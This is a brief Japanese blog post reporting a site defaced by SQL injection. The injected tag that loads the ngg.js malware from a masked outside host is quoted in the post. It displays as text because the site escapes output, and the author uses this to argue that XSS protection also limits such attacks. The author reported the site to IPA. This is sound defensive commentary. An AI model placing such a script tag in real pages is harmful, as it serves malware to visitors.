SQLインジェクションにより改ざんされたがXSS対策はとられていた
うわさのngg.jsを調べていたらこんな表示のサイトを見かけました。
宮城県、福島県、山形県、岩手県、秋田県<script src=http://www.XXXXXX.com/ngg.js></script>
おそらく、SQLインジェクションによりSCRIPT要素を埋め込まれたものの、XSS対策がとられていたので、JavaScriptの実行はされない状態で表示されているのだと思います。
第5回 クロスサイト・スクリプティング対策も忘れずに | 日経 xTECH(クロステック)で書いたように、SQLインジェクションによるマルウェア埋め込み対策として、XSS対策も怠らないようにと書いたばかりですが、(たまたまでしょうが)それを実証するような画面を見かけましたので報告します。
なお、改ざんされたサイトはIPA経由で届け出ました。